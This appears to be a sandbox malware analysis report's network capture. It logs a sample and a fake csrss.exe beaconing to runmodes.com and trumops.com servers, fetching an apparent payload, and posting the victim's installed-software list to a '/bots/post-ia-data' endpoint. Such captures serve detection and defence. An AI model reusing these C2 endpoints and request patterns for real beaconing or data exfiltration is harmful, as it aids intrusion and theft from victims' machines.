2021-11-04 12:13:28 UTC | 32 | IN | HTTP/1.1 200 OK
    Date: Thu, 04 Nov 2021 12:13:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.11
    access-control-allow-credentials: false
    CF-Cache-Status: DYNAMIC
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Cb6DsoWCWiiMSOtk2eA8Vp0Py8GdHuGv3rMUrU7MySWZ3WtgyoA%2Fp01iNlFKlkyrhKRSZHKrT7VPJ03VXNSrWk1hiuVU7gIp7ynyfWhNXu82cofMcBQmGjijbcqIBhSsffYLY%2Bw3"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6a8dc1afd9e77025-FRA
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-11-04 12:13:28 UTC | 32 | IN | Data Raw: 31 33 34 0d 0a 70 39 6c 4f 4c 4f 2b 37 7a 62 42 66 4e 64 61 5a 33 78 42 39 36 51 71 32 51 39 2f 35 59 30 6c 6c 56 45 39 69 58 46 6f 63 50 6e 71 72 34 47 74 59 73 61 71 79 72 6d 79 71 2b 57 36 2f 76 49 46 66 64 4e 47 30 6c 57 77 52 2f 38 55 57 6e 38 38 38 43 49 6b 39 69 61 62 41 31 67 59 6c 37 31 45 58 41 6c 36 48 52 69 51 71 66 5a 4b 37 48 34 46 7a 64 55 78 31 75 4c 4d 4f 64 6a 66 64 63 4b 70 68 67 61 7a 42 7a 59 73 58 30 43 6c 38 53 47 66 53 46 30 5a 6e 57 64 31 72 39 38 72 2f 73 5a 33 48 4c 6d 33 43 70 31 2f 6c 65 51 2f 65 34 78 55 7a 6c 38 57 2f 52 75 35 33 51 45 45 30 69 70 6d 56 37 69 32 6c 76 54 72 75 44 54 72 45 64 7a 79 58 77 68 67 37 65 61 62 38 47 54 55 32 78 59 72 4e 4d 74 68 64 75 30 48 75 6d 63 6c 76 4a 54 46 2b 52 51 62 56 52 76 4d 32 63 63
    Data Ascii: 134p9lOLO+7zbBfNdaZ3xB96Qq2Q9/5Y0llVE9iXFocPnqr4GtYsaqyrmyq+W6/vIFfdNG0lWwR/8UWn888CIk9iabA1gYl71EXAl6HRiQqfZK7H4FzdUx1uLMOdjfdcKphgazBzYsX0Cl8SGfSF0ZnWd1r98r/sZ3HLm3Cp1/leQ/e4xUzl8W/Ru53QEE0ipmV7i2lvTruDTrEdzyXwhg7eab8GTU2xYrNMthdu0HumclvJTF+RQbVRvM2cc
2021-11-04 12:13:28 UTC | 33 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49802 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
Timestamp | kBytes transferred | Direction | Data
2021-11-04 12:13:38 UTC | 33 | OUT | POST /api/log HTTP/1.1
    Host: runmodes.com
    User-Agent: Go-http-client/1.1
    Content-Length: 160
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
2021-11-04 12:13:38 UTC | 33 | OUT | Data Raw: 30 4c 58 58 58 6f 2f 45 75 77 6b 41 68 7a 59 49 44 50 48 2f 34 6b 79 47 36 75 78 4c 58 6d 59 7a 2f 67 76 65 42 78 4f 49 79 5a 47 75 74 57 65 47 6a 77 50 78 4c 31 35 5a 52 70 66 6d 6d 71 32 65 64 34 54 67 66 44 58 56 6e 2f 54 47 66 70 4d 7a 67 76 48 72 68 63 48 38 39 6e 78 4e 36 4c 78 46 4c 30 76 67 64 30 30 53 6d 63 43 77 48 6a 30 57 5a 75 7a 6d 66 2f 46 63 78 30 62 36 68 2f 37 66 34 68 63 55 57 6e 41 2b 4a 51 6b 2b 4b 64 38 37 41 50 69 38 68 62 44 52 4f 73 57 4e 76 67 3d 3d
    Data Ascii: 0LXXXo/EuwkAhzYIDPH/4kyG6uxLXmYz/gveBxOIyZGutWeGjwPxL15ZRpfmmq2ed4TgfDXVn/TGfpMzgvHrhcH89nxN6LxFL0vgd00SmcCwHj0WZuzmf/Fcx0b6h/7f4hcUWnA+JQk+Kd87APi8hbDROsWNvg==
2021-11-04 12:13:38 UTC | 33 | IN | HTTP/1.1 200 OK
    Date: Thu, 04 Nov 2021 12:13:38 GMT
    Content-Length: 0
    Connection: close
    CF-Cache-Status: DYNAMIC
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K%2FmANzxG6cuJJZvrreMH2tJE24bTsZtpqmU7WLMUj5jxJo7IDOe90xKNFg6hpCsC%2F%2FRFL13fJ5BXvlYEp6OS%2FTzDY5%2FI48xqkw24cx60Jk%2BK5lEtBxQOrjF9VRkORKQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6a8dc1e8ccd16909-FRA
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49831 | 104.21.79.9 | 443 | C:\Windows\rss\csrss.exe
Timestamp | kBytes transferred | Direction | Data
2021-11-04 12:14:04 UTC | 34 | OUT | POST /api/poll HTTP/1.1
    Host: server2.trumops.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
    Content-Length: 660
    Accept-Encoding: gzip
2021-11-04 12:14:04 UTC | 34 | OUT | Data Raw: 64 53 62 79 41 2f 6c 62 55 4a 35 64 4c 55 33 6a 45 49 2f 4f 6d 6e 30 5a 6b 47 38 51 67 48 65 7a 31 36 47 56 59 76 46 6e 4d 52 72 68 4b 2f 45 4e 38 34 73 44 31 4f 50 48 58 57 76 75 47 63 47 6d 4f 52 47 68 41 37 2b 62 79 45 70 65 38 71 55 78 4f 4a 35 67 46 6e 48 41 59 70 4b 2f 36 62 2f 74 6d 34 59 71 4a 45 76 33 31 59 78 5a 70 4e 53 76 50 36 30 62 77 2b 42 66 7a 69 70 31 4f 4c 30 56 59 6d 4a 31 46 43 57 71 31 52 37 6e 59 31 54 50 4a 79 76 31 56 75 62 67 63 65 50 54 75 69 47 6b 49 30 38 6a 72 4e 70 51 50 4f 48 6d 49 4d 39 65 54 52 4a 77 7a 30 64 2f 57 2b 71 72 4c 75 67 75 34 51 67 59 44 62 49 72 55 6e 49 4d 34 61 4d 39 38 36 4d 64 6e 6d 50 68 4a 49 65 54 50 4c 4e 39 74 4e 2b 67 65 70 30 37 70 72 36 79 69 78 61 50 49 75 55 70 5a 53 6b 78 75 53 35 2f 77 35 50
    Data Ascii: dSbyA/lbUJ5dLU3jEI/Omn0ZkG8QgHez16GVYvFnMRrhK/EN84sD1OPHXWvuGcGmORGhA7+byEpe8qUxOJ5gFnHAYpK/6b/tm4YqJEv31YxZpNSvP60bw+Bfzip1OL0VYmJ1FCWq1R7nY1TPJyv1VubgcePTuiGkI08jrNpQPOHmIM9eTRJwz0d/W+qrLugu4QgYDbIrUnIM4aM986MdnmPhJIeTPLN9tN+gep07pr6yixaPIuUpZSkxuS5/w5P
2021-11-04 12:14:04 UTC | 35 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 04 Nov 2021 12:14:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.11
    set-cookie: PHPSESSID=cnlc3ums43ob7amk913qjg230o; path=/; HttpOnly
    expires: Thu, 19 Nov 1981 08:52:00 GMT
    cache-control: no-store, no-cache, must-revalidate
    pragma: no-cache
    access-control-allow-credentials: false
    CF-Cache-Status: DYNAMIC
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K8%2BWwHFzEcC65SRlptMAbLk1ZeMBaUi3xsBQMNzzlQjB5u4QmzHcBSCpMW4bK08piNRaXwWPyWEKl2fynOjutLpjH0glYZ3e22rPHrf252BU1FX1nS%2Bm8MaGSw3sfE8O7dW6RE8S"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6a8dc28c88274a67-FRA
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-11-04 12:14:04 UTC | 36 | IN | Data Raw: 65 38 0d 0a 51 78 30 64 54 46 69 34 71 4d 73 64 45 4f 64 2f 63 6d 47 64 5a 6e 61 6b 51 76 67 68 6e 2f 38 54 49 45 56 44 41 36 6f 44 30 39 52 61 41 71 77 6f 34 32 6f 4e 55 68 30 66 53 4f 76 75 42 65 78 4c 4a 53 57 4f 4e 6d 47 58 54 4b 77 4f 48 34 6a 35 6d 6c 6d 59 65 42 75 31 53 70 57 56 56 44 4b 70 65 77 4a 6c 73 48 38 45 68 78 62 51 43 59 6b 49 7a 66 62 68 63 54 68 38 47 51 48 48 76 68 6d 49 55 2f 4c 35 67 75 53 37 62 5a 64 31 31 69 6b 42 36 77 68 4d 4e 74 67 56 50 79 68 55 57 53 51 6a 46 75 39 36 43 78 48 6a 75 70 57 41 30 72 35 44 33 42 65 44 6e 70 5a 6d 45 4b 4f 4e 44 6d 4d 49 59 47 66 62 55 36 2b 48 59 66 79 44 6c 6d 6a 4f 4b 6a 4d 78 49 65 38 52 57 77 6b 4a 43 6d 61 42 59 45 4b 62 73 51 3d 3d 0d 0a
    Data Ascii: e8Qx0dTFi4qMsdEOd/cmGdZnakQvghn/8TIEVDA6oD09RaAqwo42oNUh0fSOvuBexLJSWONmGXTKwOH4j5mlmYeBu1SpWVVDKpewJlsH8EhxbQCYkIzfbhcTh8GQHHvhmIU/L5guS7bZd11ikB6whMNtgVPyhUWSQjFu96CxHjupWA0r5D3BeDnpZmEKONDmMIYGfbU6+HYfyDlmjOKjMxIe8RWwkJCmaBYEKbsQ==
2021-11-04 12:14:04 UTC | 36 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49751 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
Timestamp | kBytes transferred | Direction | Data
2021-11-04 12:12:36 UTC | 2 | OUT | POST /api/log HTTP/1.1
    Host: runmodes.com
    User-Agent: Go-http-client/1.1
    Content-Length: 184
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
2021-11-04 12:12:36 UTC | 2 | OUT | Data Raw: 36 55 44 43 43 39 54 2b 58 47 5a 36 42 69 70 6d 75 4f 48 43 32 6e 4f 37 70 65 2f 4c 73 2f 2b 47 79 35 72 41 30 35 67 42 66 77 53 53 4c 64 4f 64 6b 54 48 62 79 59 6e 77 43 50 41 39 2f 35 4d 41 73 51 4e 59 32 49 57 7a 52 73 44 79 54 34 32 54 37 76 4d 47 6d 71 59 75 73 71 56 78 41 4c 65 47 63 7a 6c 56 45 37 2b 73 36 4e 37 41 37 6b 32 6e 31 61 43 79 4a 75 30 30 65 53 4c 44 38 65 6b 42 6e 71 61 41 45 37 49 4d 47 58 36 64 6d 32 6e 35 65 36 57 52 41 4e 4a 73 71 2f 45 65 77 6c 6f 48 43 59 6a 56 4e 43 4a 59 4d 5a 72 44 52 47 49 54 77 49 4c 55 42 77 3d 3d
    Data Ascii: 6UDCC9T+XGZ6BipmuOHC2nO7pe/Ls/+Gy5rA05gBfwSSLdOdkTHbyYnwCPA9/5MAsQNY2IWzRsDyT42T7vMGmqYusqVxALeGczlVE7+s6N7A7k2n1aCyJu00eSLD8ekBnqaAE7IMGX6dm2n5e6WRANJsq/EewloHCYjVNCJYMZrDRGITwILUBw==
2021-11-04 12:12:36 UTC | 2 | IN | HTTP/1.1 200 OK
    Date: Thu, 04 Nov 2021 12:12:36 GMT
    Content-Length: 0
    Connection: close
    CF-Cache-Status: DYNAMIC
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LpViToLIrj5PhFrwqy%2FjaoP7MlNxERPOobbLIiyFXoqU66%2FydePwuqkUnoM53d%2BY4%2FvabdQxQZFn9sb%2FuEdKH4ml94LucJ%2BI8kcCISpV%2Fh7iOhc703RLpIBc4Zuh6Ao%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6a8dc06add270610-FRA
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49752 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
Timestamp | kBytes transferred | Direction | Data
2021-11-04 12:12:37 UTC | 3 | OUT | POST /api/log HTTP/1.1
    Host: runmodes.com
    User-Agent: Go-http-client/1.1
    Content-Length: 184
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
2021-11-04 12:12:37 UTC | 3 | OUT | Data Raw: 66 34 36 6d 63 47 63 47 78 38 61 6e 47 63 75 43 4b 6b 37 58 2b 74 77 45 75 72 6b 53 41 47 2f 66 7a 48 69 4d 48 4d 45 69 35 64 2f 42 62 55 4f 43 34 36 4f 4e 47 72 45 42 38 44 76 68 76 48 6d 59 71 7a 34 2b 4f 4e 6a 4f 31 30 53 50 6f 68 62 35 49 77 76 7a 41 63 4a 69 78 71 47 6d 36 6f 7a 55 71 63 6a 50 4e 76 30 48 49 67 76 45 47 61 74 42 57 61 30 6b 38 4d 65 75 42 46 70 74 67 4a 2b 66 6c 59 31 41 74 33 65 6e 30 75 33 77 79 30 74 64 47 69 6a 55 4d 6e 78 4e 47 49 58 31 57 49 48 58 69 59 42 56 70 72 63 62 4b 67 33 56 69 74 4d 67 6f 53 71 5a 65 45 5a 53
    Data Ascii: f46mcGcGx8anGcuCKk7X+twEurkSAG/fzHiMHMEi5d/BbUOC46ONGrEB8DvhvHmYqz4+ONjO10SPohb5IwvzAcJixqGm6ozUqcjPNv0HIgvEGatBWa0k8MeuBFptgJ+flY1At3en0u3wy0tdGijUMnxNGIX1WIHXiYBVprcbKg3VitMgoSqZeEZS
2021-11-04 12:12:37 UTC | 3 | IN | HTTP/1.1 200 OK
    Date: Thu, 04 Nov 2021 12:12:37 GMT
    Content-Length: 0
    Connection: close
    CF-Cache-Status: DYNAMIC
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=skJ3EUIWr64bn2ZBpZB%2FUza5IcFcVK1GnoBGeZNVUNw6tAqiu3w0RD2i%2FVOEjtqhdUYauXODe2vSW3VkEebSi5J4RBuav3d05zXPONiDRgl7VLx6Y2xknNK7ktHpo1Y%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6a8dc06bbf024e7f-FRA
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID 4: 192.168.2.3:49753 -> 172.67.139.144:443 (process C:\Users\user\Desktop\0NlSa5bf55.exe)

2021-11-04 12:12:37 UTC | 4 kB transferred | OUT
GET /api/cdn?c=dfd675dbadcd07bb&kind=main&uuid= HTTP/1.1
Host: server16.trumops.com
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

2021-11-04 12:12:38 UTC | 4 kB transferred | IN
HTTP/1.1 200 OK
Date: Thu, 04 Nov 2021 12:12:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.11
access-control-allow-credentials: false
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y4yBcOTEnqgeuKRPTB%2BXi9MTvSPQYqR4IPUIF6pEKxoNuwSJEedzbMGrA3JRmf6McQdWBMeHTdLzGgtfMNGs9Mb0SSQidBJFIGoeQhX3%2BEbW8eGmrizD5bHo%2BE9MF0mfQmiLZKblkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a8dc06d9abd74ed-LHR
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

2021-11-04 12:12:38 UTC | 5 kB transferred | IN
Data Ascii: 1345jK52Dz6YO6qaygsYiECmjFS87PjR8KtUVVcXvU4nL6N9box8196G5DA6r6dMK6A4Svc9C7Z168tsPW2Ph6iiMpDtKs2dytACWyWztoxQ8/cY7RF84SW9WdEd4Qqt1wRpJsxyMDerHMgDMSR9ypq7HrK2cHZzcOHBEWkT3win1PClorXixBZPT1P1Ya2NQZlopFwwhyBOfjYRb+UFPDOMkb3X397vfLYdO5gqnNrB2hL571zk+/Rlijslk

2021-11-04 12:12:38 UTC | 5 kB transferred | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID 5: 192.168.2.3:49755 -> 172.67.207.136:443 (process C:\Users\user\Desktop\0NlSa5bf55.exe)

2021-11-04 12:12:40 UTC | 5 kB transferred | OUT
POST /api/log HTTP/1.1
Host: runmodes.com
User-Agent: Go-http-client/1.1
Content-Length: 172
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

2021-11-04 12:12:40 UTC | 5 kB transferred | OUT
Data Ascii: t61JKu+tWQaRzckJizZwrB1XI1iXGECC4bH3TtWR9i2ir7UreKlUfYiJH+dzmvy2qeaK3jRY3KE3Uo4CWK+QuRSXErIUk+MxEj3eDJfHRd9ZtTUepgHCR0xmPW2x589tqQO5z4mL40GjfGrx5Lg4Jq52+3j6JfP5CD6Z7pvT3F8=

2021-11-04 12:12:40 UTC | 5 kB transferred | IN
HTTP/1.1 200 OK
Date: Thu, 04 Nov 2021 12:12:40 GMT
Content-Length: 0
Connection: close
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Dun0UjAq3ixcBOnnjd024SseZgFFG6j6dis8sOjYPFrIkjz5js9P3HOVqgMlQHh6peCABhzEaWAn9j%2B6KL9%2FXkyvJVkWTaaAzMTyh4PqmR2MtBPmzly8MgER9Ng9AWY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a8dc07f7afd5b98-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID 6: 192.168.2.3:49756 -> 172.67.207.136:443 (process C:\Users\user\Desktop\0NlSa5bf55.exe)

2021-11-04 12:12:43 UTC | 6 kB transferred | OUT
POST /api/log HTTP/1.1
Host: runmodes.com
User-Agent: Go-http-client/1.1
Content-Length: 156
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

2021-11-04 12:12:43 UTC | 6 kB transferred | OUT
Data Ascii: Vy/aFDtT1l9mr9cLjMZR1K3kio3FRG3q6So4DBOLxscSV83pnYWbAzYL3UMKayC4d0ePAEgK2aQETp+FPHLgf0SkeD5gYpKQzpa5UY1IHn27Y7OcI7/PrKMOBJl9xI4NIVYQVcVvKATC09IcU51U+AM3I4dS

2021-11-04 12:12:43 UTC | 6 kB transferred | IN
HTTP/1.1 200 OK
Date: Thu, 04 Nov 2021 12:12:43 GMT
Content-Length: 0
Connection: close
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4iuQxDfQ4tFtkJeEfhdWkJJtiCKEolmQLd1nM9OktOuhrmyLlseynRgsZ0dPc%2FcKDg4zKZPpYXw%2BRN5DD%2BEBtEFPRvE5pmI5JEGr6Fb%2Bnwgemk4THQ8WbSPkH63CXRw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a8dc093f86342cf-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID 7: 192.168.2.3:49759 -> 172.67.207.136:443 (process C:\Users\user\Desktop\0NlSa5bf55.exe)

2021-11-04 12:13:06 UTC | 7 kB transferred | OUT
POST /api/log HTTP/1.1
Host: runmodes.com
User-Agent: Go-http-client/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

2021-11-04 12:13:06 UTC | 7 kB transferred | OUT
Data Ascii: YLl2MaGfx5HdoZuhMe5+B7pvXSj4z+xdZOs15H3U/Ak8igMfujUHj3V5Y1ct8FBzF2a/KlshwAlkZ1cjwuWaLuoSF7OqxUKwDcattjO2O4t62soSyIaB1wWSgZA2bJfTX9Jo9uag9dpApQR5

2021-11-04 12:13:06 UTC | 7 kB transferred | IN
HTTP/1.1 200 OK
Date: Thu, 04 Nov 2021 12:13:06 GMT
Content-Length: 0
Connection: close
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PPyqYirpvXYcS4wMqSEt3f0pKXWnzhko8g8e0wD%2FXh7ehbgyLoU0kPcac1Ldj12x%2BaIVK28BT0unXTygXNiR1YB%2B1Ugm8NNUpr6DI7jIrEjFIp%2FKBHEWKYYihYZew98%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a8dc125cf074e1a-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  8192.168.2.349760104.21.79.9443C:\Windows\rss\csrss.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:13:06 UTC8OUTPOST /bots/post-ia-data?uuid=442b90d2-fde4-485f-a003-6086e2191d6e HTTP/1.1
                                                                                                  Host: server2.trumops.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Content-Length: 18950
                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:13:06 UTC8OUTData Raw: 5b 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 39 20 58 36 34 20 4d 69 6e 69 6d 75 6d 20 52 75 6e 74 69 6d 65 20 2d 20 31 34 2e 32 31 2e 32 37 37 30 32 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 34 2e 32 31 2e 32 37 37 30 32 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 31 39 30 36 32 37 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 32 20 52 65 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 28 78 36 34 29 20 2d 20 31 31 2e 30 2e 36 31 30 33 30 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 31 2e 30 2e 36 31 30 33 30 2e 30 22 2c 22 69 6e 73 74
                                                                                                  Data Ascii: [{"display_name":"Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702","display_version":"14.21.27702","install_date":"20190627"},{"display_name":"Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030","display_version":"11.0.61030.0","inst
                                                                                                  2021-11-04 12:13:06 UTC9OUTData Raw: 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 53 68 61 72 65 64 20 36 34 2d 62 69 74 20 53 65 74 75 70 20 4d 65 74 61 64 61 74 61 20 4d 55 49 20 28 45 6e 67 6c 69 73 68 29 20 32 30 31 36 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 37 35 35 38 30 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22
                                                                                                  Data Ascii: lay_name":"Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Update for Microsoft Office 2016 (KB4475580) 32-Bit Edition","display_version":"","install_date":""
                                                                                                  2021-11-04 12:13:06 UTC11OUTData Raw: 4b 42 34 34 37 35 35 38 30 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 50 75 62 6c 69 73 68 65 72 20 32 30 31 36 20 28 4b 42 34 30 31 31 30 39 37 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 36 34 35
                                                                                                  Data Ascii: KB4475580) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Publisher 2016 (KB4011097) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB44645
                                                                                                  2021-11-04 12:13:06 UTC12OUTData Raw: 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 35 2d 32 30 31 39 20 52 65 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 28 78 38 36 29 20 2d 20 31 34 2e 32 31 2e 32 37 37 30 32 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 34 2e 32 31 2e 32 37 37 30 32 2e 32 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 31 30 36 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74
                                                                                                  Data Ascii: ll_date":""},{"display_name":"Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702","display_version":"14.21.27702.2","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4484106) 32-Bit Edition","display_version":"","inst
